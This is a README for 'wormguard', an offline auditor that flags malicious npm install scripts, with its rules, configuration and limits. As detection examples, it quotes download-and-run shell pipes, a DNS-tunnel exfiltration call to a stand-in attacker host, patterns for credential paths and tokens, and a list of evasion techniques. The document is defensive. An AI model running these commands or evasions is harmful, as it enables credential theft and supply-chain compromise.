Package Exports
- wormguard
- wormguard/corpus
- wormguard/package.json
wormguard
An offline, AST-grade install-script auditor for npm, pnpm, yarn (classic +
berry), and bun. It performs real JavaScript AST analysis with a small
taint approximation, matches against an offline corpus of confirmed
malicious npm packages (~23k names from the GitHub Advisory Database) and
known C2/exfil endpoints, fingerprints lifecycle scripts of widely-used
native packages so legitimate postinstall work doesn't drown the report,
and detects the Shai-Hulud-class injection pattern (a normally-trusted
package whose install script body suddenly differs from any known-good
fingerprint).
This is not a sandbox, not a CVE scanner, and not a SaaS-backed behavioral monitor. It is defense-in-depth designed to sit alongside those tools.
What it actually does
| Layer | Mechanism | Catches |
|---|---|---|
| Lockfile inventory | Parsers for npm v1/v2/v3, pnpm v6/v7/v9, yarn classic via @yarnpkg/lockfile, yarn berry, and bun.lock (JSONC) | Package set, integrity, registry hosts, hasInstallScript flag |
| Lifecycle command parsing | shell-quote tokenization across &&, \|\|, ; and \|; resolves node ./script.js and node -e "…" | curl \| sh download-and-run, base64 decoding in shell, eval/source, network tools (curl/wget/nc) |
| AST analysis | acorn (the parser used by webpack/rollup/eslint) with acorn-walk, plus a regex fallback for unparseable sources | eval / new Function / vm.runIn*, dynamic require()/import(), require('http' \| 'https' \| …), fetch(), child_process.* via destructured aliases, process.env reads, secret-path string literals |
| Anti-evasion | Constant folding for + and template literals; decodes Buffer.from(literal, 'base64') and atob(literal), then re-scans the decoded text | require('ht' + 'tps'), require(`${x}https`), base64-encoded secret paths and network-builtin strings |
| Taint approximation | A source category (env-read, secret-path, crypto-key-read) reaching a sink category (network-builtin, fetch, child-process, shell-pipe) escalates severity one rung | process.env.NPM_TOKEN flowing into fetch()/https.request() |
| IoC corpus | Bundled data/iocs.json built from the public GHSA type=malware&ecosystem=npm feed (~23 000 names, refreshable via bun run refresh-corpus), plus a curated set of well-attested C2/exfil hostnames | First install of a confirmed-malicious npm package, even with no baseline |
| Script-fingerprint allowlist | data/script-allowlist.json: sha256s of the lifecycle-script body strings of 28 widely-used native packages (esbuild, sharp, prisma, bcrypt, husky, electron, playwright, …) across all non-deprecated versions | A worm that replaces the install script of a normally-trusted package; the fingerprint drift is reported as critical |
| npm provenance | Reads signatures (registry ECDSA) and dist.attestations (sigstore build provenance) from package-lock.json. The optional verifyBundle() API runs sigstore-js verification on a user-supplied bundle | Missing provenance or no attestation → low advisory; explicit verification failure → critical |
| Baseline diff | Snapshot of inventory + script hashes; audit flags newly added packages, version changes, integrity changes for the same version, and packages that gained a lifecycle script | Tampering on upgrade |
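To make the anti-evasion row concrete, here is a minimal sketch of string constant folding over ESTree-shaped nodes, which is the AST format acorn produces. This is not wormguard's implementation. The Node union is a hand-written subset of ESTree, foldString is a hypothetical name, and identifiers resolve only through a caller-supplied map of known const string bindings.

```typescript
// Hand-written subset of the ESTree node shapes that acorn produces.
type Node =
  | { type: "Literal"; value: unknown }
  | { type: "Identifier"; name: string }
  | { type: "BinaryExpression"; operator: string; left: Node; right: Node }
  | {
      type: "TemplateLiteral";
      quasis: { value: { cooked: string | null } }[];
      expressions: Node[];
    };

// Hypothetical folder: returns the string an expression always evaluates to,
// or null if any part of it is not a known string constant.
function foldString(
  node: Node,
  consts: ReadonlyMap<string, string> = new Map(),
): string | null {
  switch (node.type) {
    case "Literal":
      // Only string literals fold; numbers, regexes, etc. are left alone.
      return typeof node.value === "string" ? node.value : null;
    case "Identifier":
      // Resolved only through the caller's map of const string bindings.
      return consts.get(node.name) ?? null;
    case "BinaryExpression": {
      if (node.operator !== "+") return null;
      const left = foldString(node.left, consts);
      const right = foldString(node.right, consts);
      return left !== null && right !== null ? left + right : null;
    }
    case "TemplateLiteral": {
      // quasis and expressions interleave: q0 ${e0} q1 ${e1} q2 ...
      let out = "";
      for (let i = 0; i < node.quasis.length; i++) {
        const cooked = node.quasis[i].value.cooked;
        if (cooked === null) return null;
        out += cooked;
        if (i < node.expressions.length) {
          const part = foldString(node.expressions[i], consts);
          if (part === null) return null;
          out += part;
        }
      }
      return out;
    }
    default:
      return null;
  }
}

// The argument of require('ht' + 'tps'):
const arg: Node = {
  type: "BinaryExpression",
  operator: "+",
  left: { type: "Literal", value: "ht" },
  right: { type: "Literal", value: "tps" },
};
console.log(foldString(arg)); // https
```

A folded result such as "https" can then be matched against the network-builtin list as if the source had contained the literal. Returning null for anything that is not constant keeps the folder conservative. Unknown parts are left for other rules, such as the dynamic-require check, instead of being guessed.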
What it does NOT do
- It is not a sandbox. It does not block or intercept npm install. To actually prevent a malicious script from running, use @lavamoat/allow-scripts or npm's own ignore-scripts. wormguard is the auditor that decides whether a given lifecycle script should be allowed.
- It is not a CVE scanner. It does not consult NVD/OSV for known vulnerable versions. Use osv-scanner or npm audit for that axis.
- It is not a SaaS behavioral monitor. Tools like Socket and Phylum ingest the entire registry continuously and apply ML/behavioral models that no offline tool can match. wormguard's value is precisely that it is small, auditable, deterministic, and runs anywhere.
- It cannot deobfuscate arbitrary JavaScript. It folds simple string concatenation and one layer of base64. It does not constant-fold arbitrary expressions, evaluate the program, or trace data flows across function calls. A determined attacker can still hide a payload from pure static analysis.
Limits and bypasses (read this before depending on it)
This is static AST analysis with a small taint approximation. It is not behavioral observation, not symbolic execution, and not a sandbox. The pipeline is high-leverage against opportunistic supply-chain attacks, meaning the kit-built worm payloads typical of the 2025–2026 npm campaigns. In those campaigns the same payload is sprayed across dozens of compromised packages and has not been tuned to evade any specific tool. An attacker who has read this README can work around it. Concretely:
- Variable-resolved require()/import(): const m = process.env.X; require(m) is flagged as WG-AST-DYNAMIC-REQUIRE (medium), but I do not resolve m. If process.env.X was set elsewhere by the same script, I do not follow that flow.
- Native binaries shelled out from a lifecycle script: if postinstall runs ./bin/payload and the payload is a compiled ELF or Mach-O binary, I do not analyze it. The fingerprint-drift check still catches modifications to the script body. However, a binary payload that has always been there will not trigger a finding on its own.
- Multi-stage decode chains: I unwrap one layer of Buffer.from(literal, 'base64') and re-scan. A two-layer chain (base64 inside hex inside …) is not unwrapped.
- Off-host fetched payloads: curl https://x | sh flags WG-SHELL-PIPE (critical) at the shell level, but I do not fetch the URL or inspect what would arrive over the wire. A payload that is fetched but not piped (curl -o /tmp/x; node /tmp/x) flags WG-SHELL-NET-DOWNLOAD (high). For the follow-up node /tmp/x, I analyze /tmp/x only if that file already exists at scan time. If it is downloaded at install time, only the shell command is visible to me.
- Timing/conditional payloads: if (Date.now() > X) malicious() is still detected as long as the malicious branch contains something a rule matches. Static analysis never evaluates Date.now(), so to me every branch is reachable.
- Cross-file / cross-function taint: the taint approximation is intra-procedural and largely intra-file. const t = process.env.SECRET in one module and fetch(url, t) in another module are not connected. The same applies when the sink sits in a callee I do not inline. Splitting the source and the sink across files is a reliable evasion.
- WebAssembly payloads: a script that calls WebAssembly.instantiate(bytes) executes logic I never see. I parse JavaScript ASTs, not Wasm bytecode.
- DNS-tunnel exfiltration: dns.resolve('<base64-secret>.attacker.tld') leaks data in the queried hostname. I flag use of the dns builtin but do not decode the tunneled payload, and a userland resolver evades even that.
- Worker / IPC indirection: moving the behavior into a worker_threads worker, a child_process.fork() child, or another process reached over IPC or a socket splits it across processes that I analyze independently.
- Write-now, execute-later: some scripts only write a file (a cron/systemd unit, a shell-rc line, a git hook) and exit. At scan time that is just a filesystem write (WG-AST-FS-WRITE, medium). The execution happens out of band, after the scan, where an install-time static auditor cannot see it.
- The threat model assumes the rules are public, and they are. An attacker who knows the rule list can construct a payload that hits no rule. This is the structural limit of any heuristic detector with public rules, including, in different ways, every other free tool in this space. Mitigations: pair wormguard with a sandbox (@lavamoat/allow-scripts or npm install --ignore-scripts) and with a CVE scanner (osv-scanner). Treat it as a defense-in-depth tripwire, not a guarantee.
If your threat model includes targeted attackers who have specifically prepared a payload to evade wormguard, you need runtime sandboxing. This tool does not provide that.
False positives (measured, not asserted)
wormguard targets zero CI-gating (critical/high) false positives on
legitimate code, and that target is measured. Against a 662-package tree
of popular dependencies the current rules produce 0 critical/high and a
small number of medium informational findings. Full methodology,
before/after numbers, the root causes of the false positives that were
fixed, and the honest residual caveats are in
docs/false-positive-baseline.md.
Reproduce on your own tree with bun run scripts/fp-benchmark.ts.
The fuzzy WG-IOC-NEAR rule is intentionally medium, not high: it is a
name-proximity heuristic, so a mid-popularity package one edit from a
known-malicious name can still surface there for manual triage. The exact
corpus match (WG-IOC-NAME) remains critical.
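Both WG-IOC-NEAR and WG-TYPOSQUAT rest on edit distance. Below is a minimal sketch of the optimal-string-alignment variant of Damerau-Levenshtein, which counts insertions, deletions, substitutions, and swaps of adjacent characters. Whether wormguard uses this exact variant is an assumption. nearMatches is a hypothetical helper that mirrors the "one edit from a known-malicious name" check.

```typescript
// Optimal string alignment distance: Levenshtein plus transposition of two
// adjacent characters (a common, restricted form of Damerau-Levenshtein).
function osaDistance(a: string, b: string): number {
  const d: number[][] = Array.from({ length: a.length + 1 }, () =>
    new Array<number>(b.length + 1).fill(0),
  );
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(
        d[i - 1][j] + 1, // deletion
        d[i][j - 1] + 1, // insertion
        d[i - 1][j - 1] + cost, // substitution (or match)
      );
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1); // adjacent swap
      }
    }
  }
  return d[a.length][b.length];
}

// Hypothetical helper: corpus names exactly one edit away from `name`.
// Distance 0 (an exact match) is left to the separate exact-name rule.
function nearMatches(name: string, corpus: Iterable<string>): string[] {
  const hits: string[] = [];
  for (const candidate of corpus) {
    if (osaDistance(name, candidate) === 1) hits.push(candidate);
  }
  return hits;
}
```

With the 1–2 threshold used by WG-TYPOSQUAT, the same distance function would just be compared against 2 instead of 1.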
Where it fits
┌──────────────────┐ ┌──────────────────┐ ┌──────────────────┐
│ osv-scanner / │ │ LavaMoat │ │ Socket / │
│ npm audit │ │ allow-scripts │ │ Phylum │
│ (CVE database) │ │ (sandbox/block) │ │ (SaaS behavior) │
└────────┬─────────┘ └────────┬─────────┘ └────────┬─────────┘
│ │ │
└──────────┐ ┌─────┴──────┐ ┌─────────┘
│ │ │ │
▼ ▼ ▼ ▼
┌──────────────────────────────┐
│ wormguard │
│ offline AST + IoC corpus + │
│ script fingerprints │
│ (defense-in-depth tripwire) │
└──────────────────────────────┘
Install
bun add -d wormguard   # or: npm i -D wormguard / pnpm add -D wormguard
Requires Node ≥ 20 or Bun ≥ 1.1.
Use
# 1) Scan: AST + IoC + provenance + policy + typosquat
wormguard scan . # human report
wormguard scan . --json # machine-readable
wormguard scan . --ci # exit non-zero if anything ≥ fail severity (default: high)
# 2) Pin a baseline; later, audit for compromise-shaped changes
wormguard snapshot . # writes .wormguard-baseline.json
wormguard audit . --ci # exit non-zero on a worm-shaped diff
# 3) Refresh the bundled IoC corpus (the ONLY network-touching command)
GITHUB_TOKEN=… wormguard refresh # or: bun run refresh-corpus
# 4) Emit a LavaMoat-compatible allowScripts JSON (config bridge)
wormguard emit-allow-scripts . # prints to stdout
wormguard emit-allow-scripts . --out a.json # write to file
# Then embed under "lavamoat.allowScripts" in package.json and install
# @lavamoat/allow-scripts. wormguard's known-good fingerprints become
# allow:true; everything else defaults to deny.
Drop wormguard scan . --ci into your pipeline right after npm ci / pnpm install / yarn install.
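You can picture the emit-allow-scripts bridge as turning per-package fingerprint results into the package-name-to-boolean map that @lavamoat/allow-scripts reads from lavamoat.allowScripts in package.json. The sketch below assumes that flat map shape. ScriptedPackage, toAllowScripts, and embedInPackageJson are hypothetical names, and wormguard's actual output may carry more detail.

```typescript
// Hypothetical input: one entry per installed package that has lifecycle scripts.
interface ScriptedPackage {
  name: string; // LavaMoat key, e.g. "esbuild" or a nested path like "a>b"
  allBodiesKnownGood: boolean; // every lifecycle body matched a fingerprint
}

// Known-good fingerprints become true; everything else is an explicit false.
// Keys are sorted so the emitted JSON is stable across runs.
function toAllowScripts(pkgs: ScriptedPackage[]): Record<string, boolean> {
  const out: Record<string, boolean> = {};
  for (const p of [...pkgs].sort((x, y) => x.name.localeCompare(y.name))) {
    out[p.name] = p.allBodiesKnownGood;
  }
  return out;
}

// Embed the map under "lavamoat.allowScripts" in a parsed package.json,
// keeping any other lavamoat settings that are already there.
function embedInPackageJson(
  pkgJson: Record<string, unknown>,
  allow: Record<string, boolean>,
): Record<string, unknown> {
  const lavamoat = (pkgJson["lavamoat"] ?? {}) as Record<string, unknown>;
  return { ...pkgJson, lavamoat: { ...lavamoat, allowScripts: allow } };
}
```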
Configuration trust model (read this before deploying in CI)
wormguard's whole purpose is to detect malicious code introduced into a project. The threat model therefore assumes that an attacker may already have write access to the project tree (a compromised dependency, a commandeered branch, etc.). Reading config from inside the same project tree would be a confused deputy: the attacker who lands the payload also lands the policy that audits it.
Default behavior:
- wormguard does NOT load .wormguard.json from the scanned tree by default.
- Config is loaded from, in priority order:
  (a) the --config FILE CLI flag (path resolved at scan time);
  (b) the WORMGUARD_CONFIG environment variable (absolute path).
- If a .wormguard.json is present in the scanned tree but neither (a) nor (b) is supplied, wormguard emits WG-CONFIG-IN-REPO-IGNORED (low) so operators know the file exists and is being ignored.
- To opt back into the v0 behavior (e.g. for local development, where the developer trusts their own repo), pass --trust-repo-config. Do not use this in CI: it reopens the confused-deputy hole.
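The lookup order above can be written as a small pure function. This is a sketch, not wormguard's code. ConfigInputs and resolveConfig are hypothetical, and when both --config and --trust-repo-config are passed, the sketch assumes the CLI path wins.

```typescript
// Hypothetical description of one wormguard invocation.
interface ConfigInputs {
  cliConfigPath?: string; // value of --config FILE
  envConfigPath?: string; // value of WORMGUARD_CONFIG
  repoHasConfigFile: boolean; // .wormguard.json exists in the scanned tree
  trustRepoConfig: boolean; // --trust-repo-config was passed
}

interface ConfigDecision {
  source: "cli" | "env" | "repo" | "none";
  path: string | null;
  notices: string[]; // rule IDs to emit alongside the scan
}

function resolveConfig(
  i: ConfigInputs,
  repoConfigPath = ".wormguard.json",
): ConfigDecision {
  // (a) The CLI flag wins (assumed to win over --trust-repo-config too).
  if (i.cliConfigPath) return { source: "cli", path: i.cliConfigPath, notices: [] };
  // (b) Then the environment variable.
  if (i.envConfigPath) return { source: "env", path: i.envConfigPath, notices: [] };
  // Opt-in only (never in CI): read the scanned repo's own config.
  if (i.trustRepoConfig && i.repoHasConfigFile) {
    return { source: "repo", path: repoConfigPath, notices: [] };
  }
  // Default: ignore any in-repo config, but report that it exists.
  return {
    source: "none",
    path: null,
    notices: i.repoHasConfigFile ? ["WG-CONFIG-IN-REPO-IGNORED"] : [],
  };
}
```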
Recommended CI pattern:
Place your wormguard policy in a CI-controlled location (a separate secured branch, an org-wide policy repo, or a build-server file), then:
# .github/workflows/audit.yml
- run: bun add -D wormguard
- run: bun wormguard scan . --ci --config ${{ runner.workspace }}/policy/wormguard.json
A compromised repo cannot influence the path passed to --config from the workflow.
Configuration — .wormguard.json schema
{
"allowedHosts": ["registry.npmjs.org", "npm.mycorp.example"],
"allowMissingIntegrity": false,
"ignoreRules": ["WG-INVENTORY-ADDED"],
"failSeverity": "high",
"scriptAllowlist": [
{
"package": "my-internal-tool",
"rules": ["WG-AST-CHILD-PROCESS"],
"scriptSha256": "e3b0c4429842…"
}
],
"scriptFingerprints": {
"my-internal-tool": [
"e3b0c4429842c4498…known-good-postinstall-hash",
"9f86d081884c7d6594…known-good-prepare-hash"
]
}
}
Granularity is intentional: scriptAllowlist allows rule X for package Y, optionally bound to a specific script-body hash. If the package's
script changes, the suppression no longer applies, which is exactly what
you want.
The legacy allowInstallScripts: ["pkg-a", "pkg-b"] (whole-package
suppression) is parsed for backward compatibility and emits a deprecation
notice.
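The hash-bound suppression rule can be sketched as a single predicate. The Finding and AllowlistEntry shapes here are simplified assumptions (wormguard's real finding objects carry more fields), and isSuppressed is a hypothetical name. The last clause is what stops a suppression from carrying over to a changed script body.

```typescript
// Simplified, hypothetical shapes.
interface Finding {
  rule: string; // e.g. "WG-AST-CHILD-PROCESS"
  packageName: string;
  scriptSha256?: string; // sha256 of the lifecycle body that triggered it
}

interface AllowlistEntry {
  package: string;
  rules: string[];
  scriptSha256?: string; // optional binding to one exact script body
}

// Suppressed only if an entry names this package AND this rule, and, when the
// entry is hash-bound, the current script body still has that exact hash.
function isSuppressed(f: Finding, allowlist: AllowlistEntry[]): boolean {
  return allowlist.some(
    (e) =>
      e.package === f.packageName &&
      e.rules.includes(f.rule) &&
      (e.scriptSha256 === undefined || e.scriptSha256 === f.scriptSha256),
  );
}
```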
Rule reference
| id | severity | meaning |
|---|---|---|
| WG-IOC-NAME | critical | package version is in a confirmed-malicious range from the GHSA type=malware corpus |
| WG-WORM-PROPAGATE | critical | lifecycle script writes to package.json AND invokes npm publish (Shai-Hulud-style self-propagation primitive) |
| WG-IOC-NAME-LEGACY | medium | package name is in the GHSA corpus but the installed version cannot be confirmed inside the affected range (or no version was supplied) |
| WG-IOC-NEAR | medium | package name is 1 edit from a confirmed-malicious npm package (likely typosquat of a known-malicious package) |
| WG-IOC-SCRIPT-HASH | critical | sha256 of a lifecycle script body matches a known-malicious fingerprint |
| WG-IOC-DOMAIN | critical | lifecycle script source references a known C2/exfil hostname |
| WG-SCRIPT-FINGERPRINT-DRIFT | critical | known-good package whose lifecycle-script body hash differs from every accepted fingerprint (worm-injection signature) |
| WG-SHELL-PIPE | critical | lifecycle command pipes content into a shell |
| WG-AST-SHELL-PIPE | critical | inline JS inside node -e … pipes into a shell |
| WG-DIFF-INTEGRITY | critical | integrity changed for the same version (content tampering) |
| WG-DIFF-SCRIPT-BODY | critical | lifecycle script BODY changed for the same version (worm-injection on disk) |
| WG-PROVENANCE-INVALID | critical | sigstore or registry-signature verification failed |
| WG-AST-EVAL | high (→critical with taint) | eval / new Function / vm.runIn* |
| WG-AST-CONCAT-EVAL | high | feeds a non-literal value to eval (obfuscation) |
| WG-AST-NETWORK-BUILTIN | high (→critical with taint) | require('http'/'https'/'net'/'tls'/'dns'/'dgram') |
| WG-AST-FETCH | high (→critical with taint) | fetch() |
| WG-AST-SECRET-PATH | high | string literal references .npmrc/.aws/.ssh/.netrc/id_rsa/etc |
| WG-AST-CRYPTO-KEY | high | reads/uses cryptographic private-key material |
| WG-SHELL-NET-DOWNLOAD | high | curl/wget/nc invoked from the lifecycle command |
| WG-SHELL-EVAL | high | shell-level eval or source |
| WG-DIFF-NEW-SCRIPT | high | package gained a lifecycle script since baseline |
| WG-DIFF-REGISTRY | high | resolved URL / registry host changed for the same version |
| WG-INSECURE-RESOLVED | high | resolved over http:// |
| WG-TYPOSQUAT | high/medium | name within Damerau-Levenshtein 1–2 of a popular package |
| WG-AST-CHILD-PROCESS | medium (→high with taint) | spawns a child process |
| WG-AST-FS-WRITE | medium | writes to the filesystem |
| WG-AST-BASE64 | medium | decodes base64 (decoded body is re-scanned for further indicators) |
| WG-AST-DYNAMIC-REQUIRE | medium | require()/import() with non-literal argument |
| WG-AST-PARSE-FAILED | medium | acorn could not parse; regex fallback used |
| WG-SHELL-BASE64 | medium | shell-level base64 -d / openssl enc -d |
| WG-NO-INTEGRITY | medium | missing integrity hash |
| WG-UNKNOWN-REGISTRY | medium | resolved from a non-allowed registry host |
| WG-AST-ENV-READ | low (→medium with taint) | reads process.env |
| WG-INSTALL-SCRIPT | low | advisory: package defines lifecycle scripts |
| WG-INSTALL-SCRIPT-ALLOWLISTED | low | every lifecycle body matches a bundled known-good fingerprint |
| WG-PROVENANCE-MISSING | low | no registry signatures and no build provenance |
| WG-PROVENANCE-NO-ATTESTATION | low | registry-signed but no npm publish --provenance attestation |
| WG-PROVENANCE-EXPIRED-KEY | low | registry signature verifies, but the signing key has since expired |
| WG-PROVENANCE-NO-KEYS | medium | bundled npm registry public keys are unavailable; cannot verify |
| WG-NO-PREVENTION-LAYER | low | a lockfile is present (project installs deps) but no install-time prevention layer is configured (@lavamoat/allow-scripts, ignore-scripts=true in .npmrc, enableScripts: false in .yarnrc.yml, or pnpm onlyBuiltDependencies). wormguard reports findings; you also need a prevention layer to block. |
| WG-CONFIG-IN-REPO-IGNORED | low | found .wormguard.json in the scanned tree but ignoring it (default trust model) |
| WG-CONFIG-MISSING | medium | --config FILE or WORMGUARD_CONFIG was supplied but the file is missing or invalid |
| WG-YARN-PNP-NO-NODE-MODULES | medium | yarn-berry lockfile present but no node_modules (PnP mode) |
| WG-DIFF-ADDED / -REMOVED / -VERSION | low | inventory changes since baseline |
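The "(→X with taint)" entries above describe a one-rung escalation, and --ci fails when any finding reaches the fail severity. Both can be sketched over an ordered severity ladder. The category names come from the "Taint approximation" row. withTaint approximates "source reaches sink" by co-occurrence in one analyzed scope, which is cruder than wormguard's own flow check is likely to be. reachesThreshold is a hypothetical stand-in for the exported meetsFail.

```typescript
const SEVERITIES = ["low", "medium", "high", "critical"] as const;
type Severity = (typeof SEVERITIES)[number];

// Move one rung up the ladder, capping at critical.
function escalate(s: Severity): Severity {
  const i = SEVERITIES.indexOf(s);
  return SEVERITIES[Math.min(i + 1, SEVERITIES.length - 1)];
}

// Category names from the "Taint approximation" row.
type Source = "env-read" | "secret-path" | "crypto-key-read";
type Sink = "network-builtin" | "fetch" | "child-process" | "shell-pipe";

// Hypothetical: bump a finding once if any source and any sink were seen in
// the same analyzed scope (co-occurrence, not a real data-flow proof).
function withTaint(base: Severity, sources: Set<Source>, sinks: Set<Sink>): Severity {
  return sources.size > 0 && sinks.size > 0 ? escalate(base) : base;
}

// Fail the build if any finding is at or above the threshold.
function reachesThreshold(found: Severity[], fail: Severity): boolean {
  const min = SEVERITIES.indexOf(fail);
  return found.some((s) => SEVERITIES.indexOf(s) >= min);
}
```

For example, a WG-AST-FETCH finding (high) in a script that also reads process.env comes out as critical, which matches the rule table.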
Library API
import { scan, snapshot, diff, inventoryOf, meetsFail } from "wormguard";
import { matchPackageName, matchDomains } from "wormguard/corpus";
const { findings, counts, lockfilesUsed } = scan(process.cwd());
if (meetsFail(findings, "high")) process.exit(1);
// Direct corpus matching (offline, no network):
matchPackageName("definitely-malicious-pkg"); // → critical Finding | null
matchDomains(sourceText); // → string[] of IoC domains
Threat model
wormguard catches:
- A new version of a previously trusted package whose install script body no longer matches any known-good fingerprint (the worm-injection signature: WG-SCRIPT-FINGERPRINT-DRIFT).
- An install script that, after AST-based deobfuscation, uses eval/new Function, dynamic require(), network builtins, fetch(), child_process, secret-path literals, or cryptographic key reads.
- An install script whose execution chain reaches a network sink with a source from process.env, secret paths, or private keys (taint escalation).
- A lifecycle command that pipes a download into a shell, base64-decodes in shell, or runs eval/source.
- A package whose name appears in the GHSA type=malware corpus (≈23 000 entries, refreshable).
- A lifecycle source referencing a known C2/exfil hostname.
- A baseline diff: new install script, integrity change for an unchanged version, registry change, added/removed/version-changed packages.
- An npm package without provenance attestation (a low advisory on its own; combined with a lifecycle script in a namespace that worms have targeted, the findings add up).
It does not catch:
- A known CVE in a package whose installation looks normal (use osv-scanner/npm audit).
- Malicious behavior triggered at runtime rather than at install time (use Socket/Phylum, or LavaMoat at runtime).
- Heavily obfuscated JS payloads beyond one layer of constant folding + base64.
- Anything that requires sandboxing or blocking; wormguard reports, your CI gate decides.
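The fingerprint-drift signature reduces to a set-membership check on script-body hashes. In this sketch the caller hashes each lifecycle body, for example with node:crypto's createHash("sha256").update(body).digest("hex"). The allowlist is assumed to be a map from package name to accepted digests. classifyScripts is a hypothetical name, and only packages that define lifecycle scripts are expected to reach it.

```typescript
// Verdicts named after the rule table.
type ScriptVerdict =
  | "WG-SCRIPT-FINGERPRINT-DRIFT" // critical: known package, unknown body
  | "WG-INSTALL-SCRIPT-ALLOWLISTED" // low: every body is a known-good fingerprint
  | "WG-INSTALL-SCRIPT"; // low: package not in the allowlist at all

// `bodyHashes`: hex sha256 of each lifecycle script body (computed by caller).
// `allowlist`: package name -> set of accepted body digests.
function classifyScripts(
  name: string,
  bodyHashes: string[],
  allowlist: ReadonlyMap<string, ReadonlySet<string>>,
): ScriptVerdict {
  const accepted = allowlist.get(name);
  if (accepted === undefined) return "WG-INSTALL-SCRIPT";
  // A single unrecognized body on a normally-trusted package is the
  // worm-injection signal.
  return bodyHashes.every((h) => accepted.has(h))
    ? "WG-INSTALL-SCRIPT-ALLOWLISTED"
    : "WG-SCRIPT-FINGERPRINT-DRIFT";
}
```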
How verification works (and what does NOT happen)
The 154 tests are committed at test/*.test.ts and are reproducible by any
clone with bun test. The CI workflow runs them on Ubuntu and macOS on
every push/PR. Real-world fixtures used by the cryptographic-verification
tests (test/fixtures/provenance/sigstore-3.1.0.json,
test/fixtures/provenance/lodash-4.17.21.json) are committed bytes
captured from the public npm registry — anyone can re-fetch them and
diff to confirm they have not been tampered with.
There is no AI self-validation in this project. Earlier drafts of the repository contained an automated "validator" report produced by the same agent that wrote the code; that file was deleted in v1 because an automated validator validating itself is not independent in any useful sense. The current verification surface is:
- The committed test suite (bun test).
- The committed real-world fixtures used by the cryptographic verification tests.
- The CI workflow that re-runs both on a clean machine on every push.
- The bundled reference data files (see the next section), each with a top-level fetchedAt field documenting when it was regenerated.
If you want a third-party audit, run the test suite yourself, diff the
fixtures against the public registry, and read the rules in
src/ast/analyzer.ts and src/ast/orchestrate.ts. Every rule is small
enough to read and has a corresponding test.
Reference data (provenance and refresh)
| File | Source | Refresh command |
|---|---|---|
| data/iocs.json | GitHub Advisory Database (type=malware&ecosystem=npm) via the public REST API | bun run refresh-corpus |
| data/script-allowlist.json | npm registry packuments for ~60 curated packages with legitimate lifecycle scripts; sha256 of every distinct script body across non-deprecated versions | bun run refresh-allowlist |
| data/top-names.json | ecosyste.ms "most depended on" view of the npm registry (sorted descending by dependent-package count); used as typosquat reference targets | bun run refresh-top-names |
| data/npm-registry-keys.json | https://registry.npmjs.org/-/npm/v1/keys (the npm registry's public ECDSA P-256 signing keys); used to verify per-package registry signatures | Manual re-fetch when npm publishes a new key |
All four data files have a top-level fetchedAt ISO timestamp and a
source field (where applicable) documenting their public origin. The
refresh scripts are the only network-touching code in the project.
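npm documents that its registry signs the string ${name}@${version}:${integrity} with ECDSA P-256. It publishes the public keys as base64-encoded SPKI DER at the keys endpoint listed above. The sketch below verifies one such signature with node:crypto. verifyRegistrySignature is a hypothetical helper, not wormguard's API, and the demo at the bottom uses a throwaway key pair, not a real npm key.

```typescript
import { Buffer } from "node:buffer";
import { createPublicKey, generateKeyPairSync, sign, verify } from "node:crypto";

// Verify one registry signature against one registry public key.
function verifyRegistrySignature(
  name: string,
  version: string,
  integrity: string,
  sigBase64: string, // dist.signatures[].sig
  publicKeyBase64: string, // keys[].key from /-/npm/v1/keys
): boolean {
  const key = createPublicKey({
    key: Buffer.from(publicKeyBase64, "base64"),
    format: "der",
    type: "spki",
  });
  // The signed payload is exactly `${name}@${version}:${integrity}`.
  const message = Buffer.from(`${name}@${version}:${integrity}`);
  // ECDSA signatures are DER-encoded, which is node:crypto's default.
  return verify("sha256", message, key, Buffer.from(sigBase64, "base64"));
}

// Round trip with a throwaway P-256 key pair (not a real npm key).
const { privateKey, publicKey } = generateKeyPairSync("ec", { namedCurve: "prime256v1" });
const pubB64 = publicKey.export({ type: "spki", format: "der" }).toString("base64");
const integrity = "sha512-EXAMPLE==";
const sigB64 = sign("sha256", Buffer.from(`demo@1.0.0:${integrity}`), privateKey).toString("base64");

console.log(verifyRegistrySignature("demo", "1.0.0", integrity, sigB64, pubB64)); // true
console.log(verifyRegistrySignature("demo", "1.0.1", integrity, sigB64, pubB64)); // false
```

A real check would also look up the key by keyid. It would also consult the key's expires field, which is the case WG-PROVENANCE-EXPIRED-KEY reports.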
Status & roadmap
V1 (this branch): AST analyzer, IoC corpus (GHSA), provenance reader and sigstore verifier, script-fingerprint allowlist with drift detection, multi-PM lockfile parsing, granular config, baseline diff, typosquat, integrity/registry policy, CLI + JSON + CI codes.
Roadmap:
- Sigstore bundle auto-discovery from the local npm cache (~/.npm/_cacache/).
- Optional online enrichment (wormguard scan --online to fetch attestations from the registry and verify them in-line; today, bundles must be supplied to verifyBundle explicitly).
- Bigger curated script-fingerprint allowlist (community PRs).
- Scheduled IoC corpus refreshes in CI, growing the curated corpus.
- pnpm/yarn hasInstallScript extraction directly from each lockfile's metadata (today, the field is filled in by the node_modules walker).
Out of scope (not on the roadmap, by design):
- Runtime sandboxing or blocking: that is the job of @lavamoat/allow-scripts / npm install --ignore-scripts. wormguard reports; your CI gate and prevention layer block. We do not plan to integrate with LavaMoat at the runtime level; the two coexist cleanly without it. See wormguard emit-allow-scripts in the Use section above for a one-shot config bridge.
License
MIT. See LICENSE.